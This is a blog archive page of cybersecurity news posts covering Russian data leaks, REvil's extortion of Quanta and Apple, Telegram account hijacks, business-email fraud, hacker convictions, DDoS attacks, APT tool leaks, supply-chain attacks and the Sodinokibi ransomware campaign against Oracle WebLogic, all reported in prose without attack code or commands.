Search This Blog

Showing posts with label Hacking News. Show all posts

Logins and passwords of at least 1.2 million Russians have been leaked online

 The credential verification service developed by cybersecurity company BI.ZONE (a subsidiary of Sberbank) has revealed that information about logins and passwords of more than 1.2 million Russians is freely available as a result of data leaks.

"BI.ZONE, a strategic digital risk management company, helped over one and a half million Russians check their credentials for leaks containing their usernames and open passwords. The owners of more than 1 million 200 thousand contacts could become potential victims," the company said.

Experts note that this information is available not only on the darknet but also on the normal Internet. At the same time, since it is freely available, attackers do not even need to buy it.

According to Anton Okoshkin, director of anti-fraud at BI.ZONE, many Russians use the same credentials for many sites, so their leakage can lead to hacking of all accounts.

"In most cases, people use the same username and password on a variety of resources: from accounts in social networks and online stores to work services. In such a situation, if your account is compromised on one of them, the risk of hacking all accounts increases," Okoshkin noted.

At the same time, the expert noted that attackers usually begin automated verification of credentials on different services a few hours after the appearance of the leak in the public domain. "It is very important to promptly warn users about the compromise of their data," he stressed.

Almost 1.7 million Russians have already used the Bi.zone company's credential verification service. The service checks for a set of 5 billion credentials that have exactly fallen into the hands of attackers and contain user usernames and passwords. The leaked database is updated weekly.

Russian hackers reportedly stole secret device blueprints from Apple

Hackers reportedly gained access to blueprints of the latest Apple developments by attacking the servers of the Taiwanese company Quanta Computer. The announcement of the results of the attack was made in Russian.

One of Apple's main suppliers, the Taiwanese company Quanta Computer, faced a ransomware attack. The hackers demanded to pay them $50 million. Quanta Computer also produces goods for HP, Facebook and Google Alphabet.

The attack was carried out by a group of REvil ransomware operators, also known as Sodinokibi. The group announced the penetration into the computer network of Quanta Computer in its blog on the Darknet. On Sunday, a REvil spokesman, known as Unknown, said the ransomware group would soon announce "the largest attack in history," the message was made in Russian on a channel where the REvil group is recruiting new partners.

Quanta acknowledged the attack without explaining whether data was stolen.

According to the agency, REvil members tried to engage Quanta Computer in ransomware talks in the past week, ahead of Apple's first new product launch in 2021, which took place April 20.

A spokesman for the hackers claimed to have stolen and encrypted "all the local network data," demanding $50 million for the decryption key.

The hackers received a response two days later from a person who said he was "not responsible for the company," but wanted to find out the terms of the interaction. Two days later, a REvil spokesperson threatened to release data about new Apple products. This was followed by the first publication of images, which, according to the hackers, were working materials about new Apple laptops. The materials contained specific component serial numbers, dimensions and performance parameters detailing the many components inside an Apple laptop. One of the images was signed by Apple designer John Andreadis and dated March 9, 2021.

Now REvil is trying to get money from Apple, the group has demanded a ransom by May 1, and until then plans to continue publishing new files every day.

Apple declined to respond to questions about the hack.

Recall, on April 20, Apple held a presentation of its new products, it showed a new generation of iMacs with processors of its own design, iPad Pro tablets, as well as Air Tag tags for tracking the location of objects through the application.

Hackers attacked major Telegram channels via video on Yandex

 On November 10, hackers conducted a major attack on popular Telegram channels. Reddit's administrators completely lost access to the channel, to which 236 thousand people were subscribed. The attackers used the old scheme: they simply sent the Trojan-infected file to the administrators

Hackers stole the Telegram channel of the Reddit forum, administrators could not log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to the channel.

The hackers had the following scheme: they offered to buy advertising space, but first they asked to watch a video with their materials, which could be downloaded from Yandex.Disk. The document could not be opened on a mobile device, and hackers offered to download it to a desktop computer.

After launching the file, the owner of the Reddit channel with 236 thousand subscribers was no longer able to access it.

General Director of the lab Studio.AG Artem Geller explained that this is a very old method of fraud, and Windows is an object for such files. Hackers, under various pretexts, send material containing malware. It allows access to the entire operating system if the victim opens the file. In this particular case, the attackers were interested in Telegram, so the Reddit account was stolen.

Can't blame Yandex.Disk for missing the Trojan. According to Geller, about 300,000 new viruses appear every day in the world, so it's simply impossible to catch them all. Moreover, it may not be a new virus, but a modification of the old one. At the same time, the Trojan has no task to destroy the computer system.

Cloud storage is a convenient way for fraudsters, because they can upload a file of any size there, unlike email. Unprotected, unencrypted files without passwords are loaded into these vaults.

According to the information security expert Alexander Vlasov, we must remember one thing: those who provide the service for free, never sign up to the fact that they will protect your files. Yes, they are trying to track malware, but within the general outline of the ecosystem.

Hackers Stole $2.3M, Wisconsin Republicans Claims

 

Wisconsin: Republican officials said that hackers stole $2.3m from the party's account being used to support Donald Trump's re-election. 

Following the discovery of the suspicious activity on 22nd October, the FBI has been contacted to investigate the matter, as per the statements given by the state party chairman Andrew Hitt. He also that the state was warned regarding such cyberattacks in August during the party's national convention. 
 
The campaign invoices from four vendors were manipulated by hackers to steal the funds, as per the reports by the Associated Press. These vendors were being paid to send out direct mail and handing out pro-Trump material like hats to support the Trump campaign. 
 
Seemingly, the attackers began from a phishing scam and proceeded with altering the invoices to direct payments from vendors to themselves, Mr. Hitt said. A party spokesman added that no data seemed to be stolen. However, millions were stolen from the Wisconsin Republicans' federal account. 
 
According to Joe Tidy, BBC cyber-security reporter, "The information security world is tense right now waiting and watching for cyberattacks that could affect the US election." 
 
"It sounds like an almost standard case of something called Business Email Compromise (BEC). Effectively the hackers have either gained access to or spoofed an email address to put themselves between the Wisconsin Republican party HQ and one of their suppliers. The party then transferred the money to the hackers instead of its campaign partner," he said. 
 
"The reported hack comes as Mr. Trump and Democratic rival Joe Biden are both making a final push this week to secure Wisconsin ahead of the 3 November election." 
 
"There have also been hundreds of attempted attacks on the Wisconsin Democratic campaign, a spokeswoman told the Associated Press." 
 
"The Midwestern state is one of a handful of core battleground states - areas which could realistically go to the Republicans or Democrats - this election season. Candidates will need to win in several states like Wisconsin in order to win the presidency." He further added.


An IT expert at the Russian State Duma Explains Data Risks of Using VPN


"To prevent hackers from getting personal data of users, users don't need to use a VPN connection in their daily life", said Yevgeny Lifshits, a member of the expert council of the State Duma Committee on Information Policy, Information Technology and Communications.

He explained that a VPN is a virtual network that is supposed to protect the user's personal data from hackers. It is assumed that using this network allows users to maintain network privacy. However, according to the expert, VPN services carry more danger than protection.According to Lifshits, such services are not needed in everyday life.

"Sometimes VPN services are necessary for work to transfer commercial data. In everyday life, they have no value."

According to the expert, if a person does not commit crimes that he wants to hide with a VPN, then he does not need to protect himself.  Otherwise, passwords may end up in the hands of hackers.

"A user installing a VPN believes that he has secured himself, but the service provider may allow a data leak,” said Lifshitz. 

According to him, if the VPN service is unreliable, hackers can get passwords and other personal data of the user. The expert noted that now there are thousands of companies offering a secure connection and an ordinary person can make a mistake with the choice of a reliable one.

Earlier it was reported that the personal data of 20 million users of free VPN services were publicly available on the Internet. Experts found on the open server email addresses, smartphone model data, passwords, IP addresses, home addresses, device IDs, and other information with a total volume of 1.2 terabytes. It is noted that the leak occurred from networks such as UFO VPN, Fast VPN, Free VPN, Super VPN, Flash VPN, Secure VPN and Rabbit VPN. Some of them have millions of downloads from Google Play and the App Store and high ratings.

Russian hacker who hacked Dropbox and LinkedIn found guilty


Russian citizen Yevgeny Nikulin, accused of hacking LinkedIn eight years ago, was found guilty by a jury in San Francisco

The verdict in Nikulin's case was announced on Friday after a trial that began in March, which was interrupted due to the coronavirus pandemic and resumed in July.

In 2016, there were a number of large-scale data leaks, and many dumps, including MySpace, LinkedIn, Tumblr and Vkontakte, were eventually put up for sale.
In 2016, one of the hackers, Russian Evgeny Nikulin, was arrested and extradited to the United States in 2017.

Nikulin was accused of a number of articles, and all of them were connected with penetration into other people's networks and data theft. According to court documents, Nikulin hacked Dropbox, Formspring and LinkedIn in the spring and summer of 2012 and stole about 117,000,000 user records, including usernames, passwords and email addresses.

Nikulin then used the data stolen from LinkedIn to send phishing emails to employees of other companies. Authorities said that this way Nikulin managed to collect a lot of information about 68,000,000 Dropbox users, including usernames, email addresses and hashed passwords.
Similarly, Nikulin managed to get into the account of the Formspring engineer. Thus, in June 2012, he gained access to the company's internal user database, which at that time numbered more than 30,000,000 people.

According to data from Radio Free Europe journalists, his activity brought a good income. Nikulin bought expensive cars, watches and traveled a lot. For example, Nikulin admitted that he owns a Lamborghini Huracan, Bentley, Continental GT and Mercedes-Benz G-Class.

The sentence to Nikulin will be announced on September 29. The jury took less than one day to reach a verdict. Nikulin faces up to 32 years in prison and fines exceeding a million dollars.
Lawyer Arkady Bukh said that the defense intends to challenge the verdict. According to him, the psychiatrist who was appointed by the judge previously recognized Nikulin as mentally abnormal.
Nikulin always denied guilt and even called the charges revenge of the United States for providing political asylum in Russia to Edward Snowden.

The voting site of the United Russia party was attacked by hackers


"Initially, the voting went as usual. At seven in the morning, a rapid increase in attempts to vote began. After some time, technical support detected a DDoS attack — attempts were made to upload votes from non-existent voter IDs to the system," commented the press service of the party.
Deputy Secretary of the General Council of United Russia Sergey Perminov said that within two hours, the growth of hundreds of thousands of fake requests was stopped. At this time, there was a queue of real people who went to vote on the site.

"We use the blockchain to conduct preliminary voting — accordingly, all data comes to us in encrypted form and goes through several stages of verification. All ballots are anonymous — we don't have access to the personal information of the electors who sent them, which means we can't track the attack vector. Accordingly, we process all requests without exception. Therefore, we are now increasing our capacity in order not to lose any of the real votes," explained Perminov.

Deputy Secretary noted that they managed to stop the attack within two hours, now the system is gradually improving. All the data of real electors who managed to vote has been included in the blockchain and will be available for verification. The correctness of the vote, according to him, is not violated.

It is worth noting that United Russia is the only party in the Russian Federation that conducts primaries to nominate candidates for elected posts. Any Russian citizen can participate. This year, due to the coronavirus pandemic, primaries are held in electronic format.

Recall that on May 23, Russian President Vladimir Putin signed a law on remote voting. According to the document, a new type of voting without a paper ballot is being introduced in the Russian Federation. Special software will be used instead.

Email of the Pskov Churchman Tikhon was hacked


The Churchman Tikhon (Mr. Shevkunov), who is called "Vladimir Putin's Confessor" in the media, told about the hacking of his mail. Now blackmailers are threatening to publish information of many years

"A few months ago it turned out that my email was hacked for many years. My private and business correspondence began to be published on the Black Mirror website. In parallel, these materials were published on other telegram channels. I was asked to pay ten million rubles to suspend publication. I, of course, refused," said Tikhon.

The attackers, according to the clergyman, demanded to pay 10 million rubles ($132,000) to suspend the publication. The Churchman answered hackers that he can put all the information of his mail in open access if they will donate the same amount to the Pskov diocese.

Tikhon said that he did not want to "accept the terms of blackmailers and encourage dirty business." Shevkunov added that he did not pay attention to the hack at all and commented on it only because of many questions from the media. "I know that the competent authorities are looking for hackers, but whether they find them or not, we will see," said the Metropolitan.

"There is the COVID-19 virus, there are computer viruses, and there are such viruses in our society. They affect both those who steal other people's letters, wanting to make money on it and those who eagerly read other people's letters," stated the Churchman
Tikhon.

It is worth noting that letters from his hacked mail continue to be published so far. In particular, recently an audio file of his conversation with the filmmaker Nikita Mikhalkov was published

Hackers attacked hospitals in the Czech Republic: Russia is suspected


According to the Lidové noviny newspaper, a foreign state may be behind the cyberattacks, and hacker groups from Russia may be involved.

"The organizer is a foreign country. It is beginning to become clear that Russia may be behind this. IP addresses lead there," a high-ranking officer who is part of the team of investigators told the newspaper. His words were confirmed by a member of the Czech Security Council.

Last week, hackers tried to hack into hospital networks in the Czech Republic. According to Health Minister Adam Vojtech, all attacks were repelled, "but other attacks may follow."

Attacks to the Czech Republic, caused during the pandemic, was mentioned in a speech last weekend by US Secretary Mike Pompeo. He warned that such attacks will not go unpunished.

"I highly appreciate the support of the United States and all its allies who are helping to ensure our country's cybersecurity. Cyberattacks on Czech medical institutions during the fight against the COVID-19 epidemic are similar to the behavior of hyenas. I hope our experts will soon find those who are interested in the defeat of the Czech Republic in the fight against infection,” said Czech Foreign Minister Tomas Petrsicek, in turn.

Meanwhile, the Ukrainian Embassy in the Czech Republic said that they condemn cyberattacks on Czech medical institutions, which is especially cynical during pandemics: "Ukraine, which has been facing Russia's war for six years, including the cyberwar, stands in solidarity with its Czech friends and will share its experience in fighting the aggressor."

The Russian Embassy on its Facebook page called the publications "fake news".

"In this regard, the Embassy of the Russian Federation in the Czech Republic would like to emphasize that parasitising the topic of the coronavirus epidemic ... goes beyond all possible moral and ethical limits."

Dozens of cyberattacks on the website of the Mayor of Moscow have been recorded since the beginning of February


Group-IB specialists recorded several DDoS attacks on Moscow electronic services, including the mos.ru portal. This was announced by the CEO of the company Ilya Sachkov.

As the head of the Moscow Government’s IT department, Eduard Lysenko, reported, the site experienced as many attacks in three hours as it has not experienced in the last two quarters.
At the moment, the cyber defense company Group-IB is figuring out who needed to carry out massive attacks on government resources and is looking for perpetrators.

"The investigation has begun, our task is to understand the reasons for cyberattacks and find the perpetrators. At the moment, we can not provide details, this will interfere with the tasks of investigators", said the head of Group-IB, Ilya Sachkov.

According to him, the huge load on the website mos.ru it also caused many requests for passes from citizens. In addition, the interruptions were affected by the interest of Moscow residents, as there were numerous attempts by users to go to the portal just to explore and understand how it works.

At the same time, Sachkov added, it is possible to ensure stable operation of mos.ru, even despite increased loads. “The portal experiences problems that are standard when launching large-scale services of this kind. Such services are tested for fault tolerance, security, and implementation quality in order to ensure stability and continuity of service.”

Recall that from March 30, Moscow introduced a regime of complete self-isolation. Residents of Moscow are allowed to leave the apartment only as a last resort. Starting April 15, they will need to have a special pass to travel around the city by public or private transport. Such measures are designed to stop the spread of coronavirus infection.

Earlier, E Hacking News reported that hackers hacked the digital Pass System of Moscow residents.

Experts warned of a wave of repeated attacks on victims of cyber fraud



Group-IB specialists identified the spread of a popular scam on the Network. The Double Deception scheme is as follows: people who have already become victims of Internet scams are offered assistance in obtaining compensation for damage, after which scammers steal their personal information, including bank card information.

"The scheme has several scenarios — scammers offer to refund money for participating in popular fake polls, give away or dishonest lotteries. In another case, they promise VAT compensation for expenses on the purchase of foreign goods: medicines and dietary supplements, clothes and shoes, food, fuel, building materials, household appliances, etc.,” said Group-IB.

Experts have studied the working scheme of one of the fraudulent resources. As it turned out, behind it is a network of sites of more than 170 domain names registered for one person. Fraudsters often register their sites in the domain zone .xyz and not in .ru. This allows them to avoid quick locks.

In order to attract victims, fraudsters use several methods. They can send newsletters in social networks, messengers and by mail, or use clones of popular media. Group-IB experts gave an example of the title of one of such fake publications: "a 76-year-old pensioner received 170,000 rubles of VAT compensation and spent all the money on a stripper." From this page, users were redirected to a website where they were asked to calculate their VAT refund amount. To do this, the victim must enter four digits of the Bank card number. The final step of this scheme is to redirect the person who wants to receive compensation to the chatbot. There, the user was asked to talk to a lawyer who would help them get compensation, and finally pay for their services to get a refund. As a result, the victim's card details and money are debited by fraudsters.

Earlier, EHackingNews reported than according to cybersecurity experts, attacks on the network perimeter of domestic companies have begun to grow. Hackers are trying to get access over servers and get into the local network. This boom is caused by the transfer of employees to remote work.

Imperva Firewall Breached: Users API keys, SSL Certificates Exposed



Imperva, a leading security vendor, disclosed a security breach which exposed API keys, SSL certificates, scrambled passwords and email addresses for a subset of its customers using the Cloud Web Application Firewall (WAF) product.

Previously known as, Incapsula, the Cloud WAF examines the incoming requests into applications and obstructs any kind of malicious activity.

The breach was made known to the California based firm by a third party on August 20 and the details of the disclosure are yet to be made public.

In conversation with the Threatpost, Chris Morales, Head of Security Analytics at Vectra, said, “Losing SSL certificates and API access to an enterprise network is concerning. Secure web gateways, firewalls, intrusion detection, and prevention systems, and data loss prevention (DLP) products all perform some form of SSL intercept and decryption to perform DPI,”

“While we often point to lack of maturity of security operations or misconfiguration of cloud systems as to why a company would miss an attack, it is even more unfortunate when a security vendor who builds a cloud security product is compromised that should have the skills and capabilities to detect and respond to cyberattacks,” He further told.

Referencing from the writings of CEO, Chris Hylen, “We want to be very clear that this data exposure is limited to our Cloud WAF product… Elements of our Incapsula customer database through September 15, 2017, were exposed. These included: email addresses; hashed and salted passwords. And for a subset of the Incapsula customers through September 15, 2017: API keys and customer-provided SSL certificates.”

Assuring the users, he told, “We continue to investigate this incident around the clock and have stood up a global, cross-functional team.”

As a remedial measure, Imperva brought into force password resets and 90-day password expiration for the product which notably is a key component of the company's leading application security solution.








Teen Hacker Elliott Gunton Taking Cryptocurrency for Stolen Data


In April 2018, Elliott Gunton, a teenager from Norwich, England, was caught by the police on the charges of hacking and his PC was taken hold of by the authorities.

He was convicted at Norwich Crown Court where he admitted five charges which included illegal data exchanges, computer exploitation and money laundering offences.

Gunton was subjected to a three and a half year community  order which kept him from using internet and software and he was made to pay a sum of £407,359 by the court order.

On the charges of stealing sensitive information of people and selling it in exchange of pounds in cryptocurrency, the Norwich Crown Court sentenced him to 20 months imprisonment and let out owing to the time spent on remand.

On the examination of Gunton's computer, it was found that he had scheduled supplies of stolen data of people which included their contact information for malicious purposes like texts to carry out fraud.

At the age of 16, Gunton hacked a telecommunications firm and was found guilty of the same.

The teen made constant and sophisticated efforts to conceal his fraudulent acts and hide the payments from police and therefore he dealt in Bitcoin instead of hard currency. However, he happened to leave behind some parts of conversations where he negotiated criminal deals.

Referencing from a tweet made by Gunton last year, "Having lots of money is cool… but having lots of money without people knowing is cooler." He called himself as a "full-time crypto trader."

Cyber attacks on medical institutions have become more frequent in Russia


Kaspersky Lab has discovered a series of targeted attacks on large public health institutions in Russia.

The number of hacker attacks on Russian medical institutions has doubled this year. According to Kaspersky Lab, ten major Russian state medical institutions were attacked in spring 2019. The identity of the hackers is still unknown, but the Kaspersky Lab believes that the attackers speak Russian fluently but are outside the country.

The main purpose of the attackers is to collect financial documents, contracts for expensive treatment, invoices and other important documentation.

Spy software CloudMid has infected computers. Kaspersky lab notes that this is "unique malware" that the company has not met before. CloudMid is sent by e-mail and disguised as a VPN client of one of the Russian companies. After installing CloudMid, the program proceeds to collect documents on the infected computer, for which, in particular, it takes screenshots several times a minute.

It is known that the mailing did not become mass, only some organizations received messages.

The anti-virus expert of Kaspersky Lab Dmitry Kuznetsov says: "Cyber attackers began to be interested in the health sector. In this case, the attacks were not well technically developed, but they were targeted, and the attackers still managed to get what they wanted.”

Another expert at Kaspersky Lab, Alexey Shulmin, added that such attacks would be repeated.

Evgeny Gnedin, the head of the Analytics Department of Positive Technologies, said that hacker attacks on medical institutions are becoming a dangerous trend. The expert believes that the low level of security is primarily due to the insufficient allocation of funds for information security in medical organizations. So the attacks on medical institutions will remain relevant in the second half of 2019.

According to Andrey Arsentiev, the analyst of the group of companies InfoWatch, cybercriminals have formed groups specializing in attacks of medical institutions, which are aimed primarily at an extensive network of clinics with large volumes of structured personal data of patients.

"Protected medical information is one of the most liquid information on the black market, the cost of one record in some cases can be hundreds or even thousands of dollars. In some other cases, hackers may be interested in research conducted in large medical centers, "said the expert.

Hackers attacked the Russian State exam system for two days


Days of passing State exams are very important for 11th-grade students of Russian schools. Their future life depends on the results of the most important exam in life. It turned out that hackers wanted to influence the results of final exams.

The Federal Education and Science Supervisory Department reported on cyber attacks on information systems of the Unified State Exam (USE). According to the Department, mass DDoS-attacks on servers providing information exchange were recorded. The first attack was recorded on May 31 after the exam on history and chemistry, and then hackers attacked again the next day.

According to Sergey Kravtsov, the Head of The Federal Education and Science Supervisory Department, hackers tried to disable the system of the Department, but the experts managed to maintain the regular work of servers and their accessibility to users.

It is important to note that such attacks are carried out to overload the server and make it unavailable by sending a large number of requests.

It is known that cyber attacks did not lead to problems for organizers and graduates. Hackers chose unsuccessfully the time of the attacks as students already passed the exams. Fortunately, hacker attacks did not affect the processing of the results of the USE.

Law enforcement agencies are already informed about the incident. Now they are looking for persons who organized the attack on the infrastructure of the Ministry of Education of the Russian Federation.

This year exams will continue until July 1. At the moment there is a chance that such attacks will be repeated. The Department reported that it is ready for them and will not allow any failures.

An interesting fact is that last year on the first day of the USE, May 29, hackers attacked the site of online monitoring of the exams. According to Lyubov Dukhanin, the Deputy Chairman of the State Duma Committee on Education and Science, the USE system has sufficient protection to ensure the safety of the exams. She added that it was the first such attack on the site that controls the Unified State Exam.

Durov accused the Russian authorities of trying to hack Telegram accounts of Ural journalists



Friday night, unknown persons tried to hack Telegram and Facebook accounts of famous journalists in Yekaterinburg. The Deputy Editor-in-Chief "URA.RU" Anton Olshannikov, PR specialist Platon Mamatov and the Editor-in-Chief of the site "MSTROK" (mstrok.ru) Natalia Vakhonina suffered from the actions of the unknown hacker. In addition, unknown persons attempted to gain access to the telegram channel of the portal "Momenty" (https://tlg.name/s/momenty_ekb/3292). It is interesting to note that all of them actively wrote about the protests against the construction of the temple in Yekaterinburg.

Hackers tried to log into the accounts of journalists from a desktop computer, the IP-address of which is registered in Spain, namely in Madrid. The two-factor authentication stopped hackers, but they managed to get confirmation codes from SMS. One of the victims asked for clarification to his mobile operator to find out how the attackers were able to enter the code, but he received the answer that the office does not "advise on these issues."

The journalists drew attention to the fact that they all actively participated in coverage of the protests related to the construction of the Church of St. Catherine in the Park near the Drama Theater in Yekaterinburg. From May 13 to 18 a number of unauthorized rallies of opponents and supporters of the Cathedral in the public garden took place in Yekaterinburg. About 100 people were detained in four days. After that, President Vladimir Putin intervened in the situation, who invited the local authorities to conduct a survey of citizens about their attitude to the construction project. On May 22, the survey data were published, showing that the majority of Yekaterinburg residents (74%) oppose the construction of a Temple.

The Creator of Telegram Pavel Durov said that Russian authorities tried to hack telegram accounts of Ural journalists. He connects the attack with the protests that continued in Yekaterinburg all last week.

“It reminds us that the authoritarian Government will stop at nothing to violate the privacy of its citizens,” wrote Pavel Durov in his Telegram channel. He emphasized that all hacking attempts failed.

Nigerian BEC Fraudsters Resorting to RATs as the Tool to Amplify Attacks



The number of Business Email Compromise, also known as BEC fraud has risen up by an alarming rate; hackers have resorted to Remote Access Trojans (RAT) to amplify their attacks. 

The FBI’s Internet Crime Complaint Center, IC3 attempted to reduce the damage done by these attacks by formulating a Recovery Asset Team which took care of the consequences of  BEC scams. However, the number of scammers involved in these kinds of attacks is significantly more than ever before.

The attacks which witnessed an unprecedented upsurge are regarded as a global threat with Nigeria practicing it extensively; in the African country, money making via BEC scams have become the norm. After examining the cybercrime in Nigeria, Palo Alto Network’s Unit 42 recorded the country’s evolution into employing ransomware and malware to attain financial objectives.

In 2018, the number of groups involved in BEC scams reached up to 400 which were a hundred more than the previous year, the activities further multiplied by 54% in comparison to the year 2017.

With a monthly average of 28,227 attacks, the most affected sector was High-tech which recorded over 120,000 attacks in the previous year and the second most targeted was the wholesale industry which was subjected to around 80,000 attacks. Lastly, the third most affected sector was manufacturing, which fell prey to a total of 57,000 attacks.

Monitoring the attacks, Verizon says in a report, “Given the sheer number of incidents in this sector, you would think that the government incident responders must either be cape and tights wearing superheroes, or so stressed they’re barely hanging on by their fingernails.”

“Admittedly we do not have as much data as to what is happening beyond the deception and initial device compromise. The inclusion of keylogging malware is a good indicator that additional credential theft and reuse is a likely next step.”



Buckeye APT hackers stole the NSA hacking tools before Shadow Brokers leaked these tools




Buckeye APT hackers, a Chinese State sponsored group employed the tools of Equation Group which were leaked by the Shadow Brokers in 2017, a year earlier than the leaks.

Shadow Brokers is a mysterious assemblage of hackers who stole malware, hacking tools and zero-day exploits from the Equation group which is a branch under the NSA and is one of the most advanced and futuristic cyber attack groups across the world.

Conducting operations since 2009, Buckeye group, also known by the name of APT3, exploited these tools earlier for carrying out multiple attacks on to a number of organizations on their list, they did so in order to gain unauthorized access to these organizations mainly based in the United States.

Besides being responsible for exploiting zero-day vulnerabilities in 2014, the Buckeye group, a couple of years later, used 'Trojan.Bemstour', a custom exploit tool in order to reach the targets.

With the intent to attain remote kernel code execution on victims' computer systems, Bemstour exploited the following zero-day vulnerabilities on Windows – (CVE-2019-0703),(CVE-2017-0143). These were later employed by EternalRomance and EternalSynergy, two NSA owned exploit tools,

Referenced from the findings of Symantec report, “Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor. DoublePulsar is then used to inject a secondary payload, which runs in memory only. The secondary payload enables the attackers to access the affected computer even after DoublePulsar is removed. “

“The variant of DoublePulsar used in the first attacks performed by Buckeye was different to that leaked by the Shadow Brokers. It appears to contain code to target newer versions of Windows (Windows 8.1 and Windows Server 2012 R2), indicating that it is a newer version of the malware.”






A Hacker Group, 'Barium' on a Supply Chain Hijacking Spree



One of the most fatal forms of hacking is a software supply chain attack as it involves illicitly accessing a developer's network and placing the malicious code into the software updates and applications that users consider and trust the most.

In a single attempt, supply chain hackers can potentially place their ransomware onto thousands or millions of computer systems, they can do so without even a single trace of malicious activity. With time, this trick has gained a lot of traction and has become more advanced and difficult to be identified. Supply chain attacks follow a similar pattern and have been used by the associated companies as their core tool.

Basically, supply chain attacks exploit various software dissemination channels and over the last three years, these attacks have been majorly linked to a group of Chinese hackers. Reportedly, they are popularly known as ShadowHammer, Barium, Wicked Panda and ShadowPad, the name varies along with the security firms.

The trick demonstrates the massive potential of ShadowHammer to destroy computer systems on a large scale along with exploiting vulnerabilities present in a fundamental model which governs the code employed by users on their systems, such destructive ability possessed by Barium is a matter of great concern for security researchers.

Referencing from the statements given by Vitaly Kamluk, the director of the Asia research team for security firm Kaspersky, "They're poisoning trusted mechanisms," "they’re the champions of this. With the number of companies they’ve breached, I don’t think any other groups are comparable to these guys."

"When they abuse this mechanism, they’re undermining trust in the core, foundational mechanisms for verifying the integrity of your system,"

"This is much more important and has a bigger impact than regular exploitation of security vulnerabilities or phishing or other types of attacks. People are going to stop trusting legitimate software updates and software vendors."

On being asked, Marc-Etienne Léveillé, a security researcher, said, "In terms of scale, this is now the group that is most proficient in supply chain attacks,"

"We’ve never seen anything like this before. It’s scay because they have control over a very large number of machines

"If [Barium] had deployed a ransomware worm like that through one of these attacks, it would be a far more devastating attack than NotPetya," said another expert on the matter.






Attackers Exploiting Oracle Weblogic Server Vulnerability to Encrypt User Data



In order to install a new variant of a malware known as "Sodinokibi", con men are taking advantage of the remote code execution vulnerability in Oracle Weblogic Server.

The vulnerability which has been recently discovered on versions
10.3.6.0, 12.1.3.0 of Oracle WebLogic Server, allows people with HTTP access to execute the attack without any verification.
Reportedly, a patch has been issued by the computer sofyware company on April 26.

The foundation of the attacks was laid around April 25 and it was on the next day, i.e., April 26, the hackers secured connections with multiple HTTP servers which were vulnerable, as per the findings of Talos Investigation.

The vulnerability has been exploited by the hackers to download the malware copies from servers administered by con men and to corrupt various legitimate sources and make alterations to repurpose it.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

How does the ransomware infects?

It begins with the HTTP POST request which carries certutil command to execute the infectious files upon downloading.

As soon the malicious process starts, it triggers the vssadmin.exe utility, which on being executed assists Windows in generating some sort of backup, either automatic or manual.

After this, the ransomware attempts to hinder the recovery process by terminating backup mechanism.

Users can reach the security alert posted by Oracle and are advised to fix the forementioned (CVE-2019-2725) vulnerability.